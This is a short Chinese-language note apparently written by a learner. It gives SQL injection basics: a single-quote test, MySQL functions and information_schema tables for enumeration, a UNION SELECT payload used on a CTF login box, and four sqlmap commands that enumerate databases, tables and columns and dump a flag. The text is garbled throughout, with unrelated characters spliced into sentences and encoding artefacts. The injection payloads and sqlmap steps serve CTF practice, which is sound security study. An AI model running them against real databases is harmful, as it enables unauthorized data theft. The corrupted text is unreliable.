sql注入筆記!
判斷是否存在注入漏洞?? 經(jīng)典的單引號(hào)判斷。
select * from xx where id= x'
報(bào)錯(cuò)說(shuō)明存在注入漏洞 不報(bào)錯(cuò)也不一定就不存在。趟庄。可能進(jìn)行了單引號(hào)的過(guò)濾伪很。
select * from xx where id=x'? 這里寫(xiě)的都是sql的查詢(xún)代碼戚啥。
// #
在滲透測(cè)試中常用的幾個(gè)函數(shù)和表庫(kù)名
數(shù)據(jù)庫(kù)名:database()
數(shù)據(jù)庫(kù)版本: version()
數(shù)據(jù)庫(kù)用戶: user()
操作系統(tǒng): @@version_compile_os
系統(tǒng)用戶名: system_user()
當(dāng)前用戶名: current_user
連接數(shù)據(jù)庫(kù)的用戶名:session_user()
一次性顯示:group_concat()
讀取數(shù)據(jù)庫(kù)路徑:@@datadir
MYSQL安裝路徑:@@basedir
load_file 轉(zhuǎn)成16進(jìn)制或者10進(jìn)制 MYSQL讀取本地文件函數(shù)
into outfile 寫(xiě)入函數(shù)
儲(chǔ)存所有數(shù)據(jù)庫(kù)信息的表 : information_schema.schemata
儲(chǔ)存所有表名信息的表 : information_schema.tables
儲(chǔ)存所有列名信息的表 : information_schema.columns
表名 : table_name
數(shù)據(jù)庫(kù)名: table_schema
字段名 : column_name
www.7ten7.top
今天做了一道題目,
一個(gè)神奇的登錄框: -1" union select 1,database() from information_schema.schemata #
這是在查詢(xún)他的數(shù)據(jù)庫(kù)名字锉试,猫十。。發(fā)現(xiàn)什么都沒(méi)有給我.
如圖呆盖,他只有2個(gè)列拖云,1,2? 然后查詢(xún) 下 1应又, 2 和 查詢(xún) 1宙项,database() 是一樣的。就是把查詢(xún)2 的位置變成了查詢(xún)數(shù)據(jù)庫(kù)的名字株扛。 查詢(xún)2個(gè)列尤筐,他只給了一個(gè)回顯位。所有我們就應(yīng)該把1位置放數(shù)據(jù)庫(kù)查詢(xún)洞就,這樣才能顯示出來(lái)盆繁。
(來(lái)自小白的嘆息。旬蟋。油昂。。)
關(guān)于sqlmap 的無(wú)情素質(zhì)4連!
先把頭文件保存起來(lái)冕碟。最好加上要傳輸?shù)臄?shù)據(jù)
//以下命令在kali 2.0中運(yùn)行正常
1稠腊、sqlmap -r "/zzz/1.txt" -p admin_name --dbs
-r + 路徑是以只讀方式打開(kāi) -p + admin_name是選取admin_name為注入點(diǎn)(injection point) --dbs是爆破數(shù)據(jù)庫(kù)名
2、sqlmap -r?"/zzz/1.txt" -D bugkusql1 -p admin_name --tables
--tables 是爆列表名
3鸣哀、sqlmap -r "/zzz/1.txt" -D bugkusql1 -T flag1 -p admin_name --columns
--columns是爆列名
4、sqlmap -r "/zzz/1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump
--dump是爆字段
最后得到flag